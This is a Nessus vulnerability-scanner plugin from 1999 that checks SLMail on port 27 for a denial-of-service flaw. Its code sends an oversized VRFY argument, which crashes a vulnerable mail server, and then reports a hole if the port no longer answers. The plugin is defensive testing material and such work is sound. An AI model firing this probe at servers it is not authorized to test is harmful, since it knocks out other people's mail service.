home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / slmail27.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  88 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7.  
  8. if(description)
  9. {
  10.  script_id(10255);
  11.  script_version ("$Revision: 1.9 $");
  12.  script_cve_id("CAN-1999-0231");
  13.  
  14.  name["english"] = "SLMail:27 denial of service";
  15.  name["francais"] = "DΘni de service contre SLMail:27";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "It was possible to perform a denial
  19. of service against the remote SMTP server by
  20. sending a too long argument to the VRFY command on
  21. port 27.
  22.  
  23. This problem allows an attacker to bring down
  24. your mail system, preventing you from sending
  25. and receiving emails.
  26.  
  27.  
  28. Solution : Update your MTA, or change it.
  29.  
  30. Risk factor : High";
  31.  
  32.  desc["francais"] = "Il a ΘtΘ possible de crΘer
  33. un dΘni de service contre le serveur SMTP
  34. distant en envoyant un argument trop long α
  35. la commande VRFY on port 27.
  36.  
  37. Ce problΦme permet α un pirate de mettre α
  38. genoux votre systΦme de mail, vous empechant
  39. ainsi d'envoyer ainsi que de recevoir des
  40. messages.
  41.  
  42. Solution : Mettez α jour votre MTA, ou changez-le.
  43. Facteur de risque : SΘrieux";
  44.  
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "VRFY aaaaa(...)aaa crashes the remote MTA";
  49.  summary["francais"] = "VRFY aaaa(....)aaa plante le MTA distant";
  50.  
  51.  script_summary(english:summary["english"], francais:summary["francais"]);
  52.  
  53.  script_category(ACT_DENIAL);
  54.  
  55.  
  56.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  57.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  58.  family["english"] = "Denial of Service";
  59.  family["francais"] = "DΘni de service";
  60.  script_family(english:family["english"], francais:family["francais"]);
  61.  script_dependencie("find_service.nes", "sendmail_expn.nasl");
  62.  script_require_ports(27);
  63.  exit(0);
  64. }
  65.  
  66. #
  67. # The script code starts here
  68. #
  69.  
  70. port = 27;
  71. if(get_port_state(port))
  72. {
  73.  soc = open_sock_tcp(port);
  74.  if(soc)
  75.  {
  76.   r = recv(socket:soc, length:1024);
  77.   if(!r){
  78.       close(soc);
  79.     exit(0);
  80.     }
  81.   data = string("VRFY ", crap(4096), "\r\n");
  82.   send(socket:soc, data:data);
  83.   close(soc);
  84.   soc2 = open_sock_tcp(port);
  85.   if(!soc2)security_hole(port);
  86.  }
  87. }
  88.